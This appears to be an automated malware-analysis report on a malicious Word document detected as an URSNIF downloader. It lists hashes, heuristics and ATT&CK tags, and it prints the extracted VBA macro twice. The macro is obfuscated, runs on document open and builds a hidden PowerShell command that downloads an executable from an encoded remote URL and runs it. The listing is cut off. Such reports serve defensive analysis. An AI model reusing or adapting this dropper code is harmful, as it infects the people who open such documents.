Office (OLE) malware analysis — malicious · 37ac0ae44ad4df57

MALICIOUS

Office (OLE)

63.6 KB Created: 2018-09-11 07:25:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: 672c5fc0dcde72d0c95a054b90173104 SHA-1: 7b7610065b0dfc07e727174bda81a22fd78946ae SHA-256: 37ac0ae44ad4df5711e66381b6ddff7a4557ae16df2f6d51cb88220648f2d4af

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro that is triggered by the Document_open event. This macro utilizes the Shell() function, indicating an attempt to execute arbitrary code. The ClamAV detection and heuristic firings strongly suggest this is a downloader for a malicious payload. No specific family could be confidently identified, but the behavior is consistent with known downloader malware.

Heuristics 5

ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4924 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4924 bytes
SHA-256: `10ebc19bc9ca9809d86eb4712a2a852018668ef14ada763dba7ad839eb379976`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "AfjHDnoZRiQa" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On _ Error _ Resume _ Next VarType "BSDYjI" + "342876675" VarType "pXw" + "rrNB" VarType "m" + "2368" VarType "F" + "kjji" + "I" + "5323" VarType "348409101" + "rYizfWqQ" VarType "266795175" + "9240" VarType "L" + "i" Shell wiwCK + jGNzaJ, Format(vbHide) VarType "446500332" + "NhZM" + "rtQzW" + "155614078" VarType "21492891" + "UrJj" + "TMPAo" + "317908301" VarType "RGL" + "hzz" VarType "8263" + "m" + "LwaSFwWDctAlA" + "jBIzKC" End Sub Attribute VB_Name = "LUwwpjzjLO" Function wiwCK() On _ Error _ Resume _ Next VarType "YOFbjDSUqODOf" + "DA" + "hizAaiNmiLmiIo" + "JtiXFECqNkOc" VarType "6393" + "PvOr" + "234009402" + "NnfE" CjtlTSFz = Format(Chr(9 + 5 + 18 + 11 + 56)) + "m" + "d " + "/V:ON" + "/" + Format(Chr(6 + 3 + 12 + 7 + 39)) + Format(Chr(3 + 1 + 5 + 3 + 22)) + "s^" + "e^t j" + "^w^d" + "= ^ " + "^ ^ " + " ^" VarType "hSMrzaK" + "wjro" UATrzcZ = " " + "^ ^ ^ " + "^ }^}" + "^{h" + Format(Chr(9 + 5 + 18 + 11 + 56)) + "^t" + "a" + Format(Chr(9 + 5 + 18 + 11 + 56)) + "};" + "^" + "k" + "a" VarType "6782" + "454144184" VarType "496731377" + "1314943" VarType "7577" + "usf" + "lPMF" + "F" VarType "qia" + "Fl" GJwrXzQfhiC = "^" + "e" + "r^b;" + "AN^" + "Q$^ ^me" + "^tI" + "-^eko" + "vn^I;)^" + "AN^" + "Q^$ " VarType "8198" + "191089212" + "5734" + "bojHMNYRitH" VarType "961" + "116789934" VarType "526698992" + "pjcj" VarType "4726" + "CAazGm" + "8071" + "zRlY" VarType "rS" + "wkqO" + "11178266" + "zzh" sHswhwFIpa = ",^O^" + "DX^$(" + "e^l^i" + "^Fda^" + "o^l" + "nwo^D^" + "." + "r^" + "SI${" + "yr" + "t^{" + ")j^HQ^" VarType "zRZjaT" + "PZjr" + "441099464" + "TWOTGTKPzlW" VarType "KEYm" + "998" VarType "418103898" + "431106573" VarType "9526" + "2759" VarType "CCi" + "522924579" FEhBFiW = "$ ni O^" + "DX$(" + "^h" + Format(Chr(9 + 5 + 18 + 11 + 56)) + "^aer" + "^o" + "f^;^" + "'e^" + "x" + "^" + "e^.^'+^" + "bJi$^+" + "^'" VarType "ivKmI" + "726" VarType "vokG" + "3354" + "9555" + "269688193" VarType "520437300" + "l" VarType "jYzIMhTraGv" + "301496448" + "353361702" + "2320" tvTpRrzQcni = "^\^'^" + "+" + Format(Chr(9 + 5 + 18 + 11 + 56)) + "^" + "i^l^b^u" + "p:vne" + "^$^=^A" + "NQ^$^" + ";^'^49" + "9^' =^ " + "bJi$^;" + ")'" + "^" + "@^'(" + "^tilp" VarType "pqtXjzKEUca" + "2451" + "zj" + "TH" VarType "ncjzmzPLtmrX" + "ibzsi" bvRtzTWHZ = "^S.^'" + "n^" + "kt^." + "^3agr^a" + "^t^=l?^" + "p^" + "h^p^." + "t^ok^sn" + "^apo/" + "T^" + "T" + "R" + "/m^" VarType "wHAwi" + "6242" + "265494161" + "814" VarType "9934" + "101702012" VarType "C" + "9830" + "3911" + "CYvkLjU" zjwMpoSL = "o" + Format(Chr(9 + 5 + 18 + 11 + 56)) + ".^l" + "1^ef^xz" + "il" + "^b^k^pf" + "^0" + "^q//^" + ":^p^tt" + "h^'" + "=" + "^jH" + "^Q^" VarType "kMPKXYMBF" + "5264" VarType "WiI" + "5353" + "2090" + "hVCN" VarType "960" + "CNqiXlwoJN" VarType "2624" + "nLqRMjan" + "Hp" + "kLkRoVbvmaj" IoRpKH = "$;" + "tn" + "eil" + Format(Chr(6 + 3 + 12 + 7 + 39)) + "^be^W^" + ".^t" + "^eN^ " + "^t" + Format(Chr(9 + 5 + 18 + 11 + 56)) + "e^" + "j^bo-^" + "w" + "^en" + "^=r^S" + "^I$" + " l^l^e" wiwCK = CjtlTSFz + UATrzcZ + GJwrXzQfhiC + sHswhwFIpa + FEhBFiW + tvTpRrzQcni + bvRtzTWHZ + zjwMpoSL + IoRpKH VarType "bwtkDJMlO" + "X" + "fOcTz" + "465334074" VarType "165784142" + "JSjFnV" End Function Function jGNzaJ() On _ Error _ Resume _ Next VarType "473391902" + "6229" VarType "7929" + "8159" + "8333" + "D" VarType "DCwa" + "krKGMn" VarType "5611458" + "8529" + "TGz" + "61" ZlWii = "h" + "s" + "re^w^" + "o" + "p&&" + "for /L " + "%" + "^w ^in" + " (^2" + "^6^" VarType "367" + "3595" + "EkB" + "qQFYzafUwiQAG" VarType "198121371" + "9048" TPztjfl = "5" + "^; ... (truncated)

SHA-256: 10ebc19bc9ca9809d86eb4712a2a852018668ef14ada763dba7ad839eb379976

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "AfjHDnoZRiQa"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   VarType "BSDYjI" + "342876675"
   VarType "pXw" + "rrNB"
   VarType "m" + "2368"
   VarType "F" + "kjji" + "I" + "5323"
   VarType "348409101" + "rYizfWqQ"
   VarType "266795175" + "9240"
   VarType "L" + "i"
Shell wiwCK + jGNzaJ, Format(vbHide)
   VarType "446500332" + "NhZM" + "rtQzW" + "155614078"
   VarType "21492891" + "UrJj" + "TMPAo" + "317908301"
   VarType "RGL" + "hzz"
   VarType "8263" + "m" + "LwaSFwWDctAlA" + "jBIzKC"
End Sub



Attribute VB_Name = "LUwwpjzjLO"
Function wiwCK()

On _
Error _
Resume _
Next
VarType "YOFbjDSUqODOf" + "DA" + "hizAaiNmiLmiIo" + "JtiXFECqNkOc"
   VarType "6393" + "PvOr" + "234009402" + "NnfE"
CjtlTSFz = Format(Chr(9 + 5 + 18 + 11 + 56)) + "m" + "d " + "/V:ON" + "/" + Format(Chr(6 + 3 + 12 + 7 + 39)) + Format(Chr(3 + 1 + 5 + 3 + 22)) + "s^" + "e^t j" + "^w^d" + "=  ^ " + "^  ^   " + " ^"
VarType "hSMrzaK" + "wjro"
UATrzcZ = "   " + "^ ^ ^ " + "^  }^}" + "^{h" + Format(Chr(9 + 5 + 18 + 11 + 56)) + "^t" + "a" + Format(Chr(9 + 5 + 18 + 11 + 56)) + "};" + "^" + "k" + "a"
VarType "6782" + "454144184"
   VarType "496731377" + "1314943"
   VarType "7577" + "usf" + "lPMF" + "F"
   VarType "qia" + "Fl"
GJwrXzQfhiC = "^" + "e" + "r^b;" + "AN^" + "Q$^ ^me" + "^tI" + "-^eko" + "vn^I;)^" + "AN^" + "Q^$ "
VarType "8198" + "191089212" + "5734" + "bojHMNYRitH"
   VarType "961" + "116789934"
   VarType "526698992" + "pjcj"
   VarType "4726" + "CAazGm" + "8071" + "zRlY"
   VarType "rS" + "wkqO" + "11178266" + "zzh"
sHswhwFIpa = ",^O^" + "DX^$(" + "e^l^i" + "^Fda^" + "o^l" + "nwo^D^" + "." + "r^" + "SI${" + "yr" + "t^{" + ")j^HQ^"
VarType "zRZjaT" + "PZjr" + "441099464" + "TWOTGTKPzlW"
   VarType "KEYm" + "998"
   VarType "418103898" + "431106573"
   VarType "9526" + "2759"
   VarType "CCi" + "522924579"
FEhBFiW = "$ ni O^" + "DX$(" + "^h" + Format(Chr(9 + 5 + 18 + 11 + 56)) + "^aer" + "^o" + "f^;^" + "'e^" + "x" + "^" + "e^.^'+^" + "bJi$^+" + "^'"
VarType "ivKmI" + "726"
   VarType "vokG" + "3354" + "9555" + "269688193"
   VarType "520437300" + "l"
   VarType "jYzIMhTraGv" + "301496448" + "353361702" + "2320"
tvTpRrzQcni = "^\^'^" + "+" + Format(Chr(9 + 5 + 18 + 11 + 56)) + "^" + "i^l^b^u" + "p:vne" + "^$^=^A" + "NQ^$^" + ";^'^49" + "9^' =^ " + "bJi$^;" + ")'" + "^" + "@^'(" + "^tilp"
VarType "pqtXjzKEUca" + "2451" + "zj" + "TH"
   VarType "ncjzmzPLtmrX" + "ibzsi"
bvRtzTWHZ = "^S.^'" + "n^" + "kt^." + "^3agr^a" + "^t^=l?^" + "p^" + "h^p^." + "t^ok^sn" + "^apo/" + "T^" + "T" + "R" + "/m^"
VarType "wHAwi" + "6242" + "265494161" + "814"
   VarType "9934" + "101702012"
   VarType "C" + "9830" + "3911" + "CYvkLjU"
zjwMpoSL = "o" + Format(Chr(9 + 5 + 18 + 11 + 56)) + ".^l" + "1^ef^xz" + "il" + "^b^k^pf" + "^0" + "^q//^" + ":^p^tt" + "h^'" + "=" + "^jH" + "^Q^"
VarType "kMPKXYMBF" + "5264"
   VarType "WiI" + "5353" + "2090" + "hVCN"
   VarType "960" + "CNqiXlwoJN"
   VarType "2624" + "nLqRMjan" + "Hp" + "kLkRoVbvmaj"
IoRpKH = "$;" + "tn" + "eil" + Format(Chr(6 + 3 + 12 + 7 + 39)) + "^be^W^" + ".^t" + "^eN^ " + "^t" + Format(Chr(9 + 5 + 18 + 11 + 56)) + "e^" + "j^bo-^" + "w" + "^en" + "^=r^S" + "^I$" + " l^l^e"
wiwCK = CjtlTSFz + UATrzcZ + GJwrXzQfhiC + sHswhwFIpa + FEhBFiW + tvTpRrzQcni + bvRtzTWHZ + zjwMpoSL + IoRpKH
   VarType "bwtkDJMlO" + "X" + "fOcTz" + "465334074"
   VarType "165784142" + "JSjFnV"
End Function
Function jGNzaJ()

On _
Error _
Resume _
Next
VarType "473391902" + "6229"
   VarType "7929" + "8159" + "8333" + "D"
   VarType "DCwa" + "krKGMn"
   VarType "5611458" + "8529" + "TGz" + "61"
ZlWii = "h" + "s" + "re^w^" + "o" + "p&&" + "for /L " + "%" + "^w ^in" + " (^2" + "^6^"
VarType "367" + "3595" + "EkB" + "qQFYzafUwiQAG"
   VarType "198121371" + "9048"
TPztjfl = "5" + "^;
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.